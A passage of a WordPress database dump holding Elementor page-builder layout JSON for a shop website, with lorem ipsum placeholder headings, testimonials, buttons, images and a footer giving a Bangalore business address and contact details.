electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8719,1513,'_elementor_page_assets','a:0:{}'),(8721,1514,'_elementor_edit_mode','builder'),(8722,1514,'_elementor_template_type','wp-page'),(8723,1514,'_elementor_version','3.7.7'),(8724,1514,'_wp_page_template','elementor_canvas'),(8725,1514,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"459f42f\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":733,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"ff18146\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d32e3fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"cca4b63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ae5ba57\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"0b52a20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0f21eac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. 